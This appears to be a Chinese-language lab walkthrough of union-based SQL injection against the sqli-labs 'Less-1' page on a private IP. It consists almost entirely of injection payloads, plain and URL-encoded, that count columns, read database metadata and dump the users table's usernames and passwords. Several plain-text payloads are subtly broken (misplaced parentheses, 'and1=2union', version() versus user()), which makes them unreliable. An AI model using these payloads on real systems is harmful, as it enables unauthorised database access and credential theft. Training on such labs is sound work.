1.判断注入点
主要是判断两个条件
1.我们传入的参数是否可控
2.我们传入的参数能否在数据库执行
?id=1'
?id=1' and 1=1 --+
?id=1' and 1=2 --+
尝试单引号注入,发现报错信息
http://192.168.183.150:8081/Less-1/?id=1%27
将单引号闭合后,页面返回正常
http://192.168.183.150:8081/Less-1/?id=1%27%20and%201=1%20--+
2.查询字段
判断字段个数
?id=1' order by 3 --+
?id=1' order by 4 --+
判断字段是否有3个,页面返回正确信息,说明有至少3个字段
http://192.168.183.150:8081/Less-1/?id=1%27%20order%20by%203%20--+
判断字段是否有4个,页面返回信息可以看出没有4个字段,说明总共只有3个字段
http://192.168.183.150:8081/Less-1/?id=1%27%20order%20by%204%20--+
确定字段精确位置
?id=1' and 1=2 union select 1,2,3 --+
http://192.168.183.150:8081/Less-1/?id=1%27%20and%201=2%20union%20select%201,2,3%20--+
3.获取当前数据库
要让前面的报错,才会执行后面的内容
?id=1' and 1=2 union select 1,database(),version() --+
http://192.168.183.150:8081/Less-1/?id=1%27%20and%201=2%20union%20select%201,database(),user()%20--+
4.获取数据库的表名
?id=1' and 1=2 union select 1, (select group_concat(table_name)) from information_schema.tables WHERE table_schema='security'), 3 --+
http://192.168.183.150:8081/Less-1/?id=1%27%20and%201=2%20union%20select%201,%20(select%20group_concat(table_name)%20from%20information_schema.tables%20WHERE%20table_schema=%27security%27),%203%20--+
5.查看users表的字段
?id=1' and 1=2 union select 1, (select group_concat(column_name)) from information_schema.columns where table_name='users' and table_schema='security'),3 --+
http://192.168.183.150:8081/Less-1/?id=1%27%20and%201=2%20union%20select%201,%20(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27users%27%20and%20table_schema=%27security%27),3%20--+
6.查看表中字段的内容
?id=1' and1=2union select 1, (select group_concat(username) from users), (select group_concat(password) from users) --+
http://192.168.183.150:8081/Less-1/?id=1%27%20and%201=2%20union%20select%201,%20(select%20group_concat(username)%20from%20users),%20(select%20group_concat(password)%20from%20users)%20--+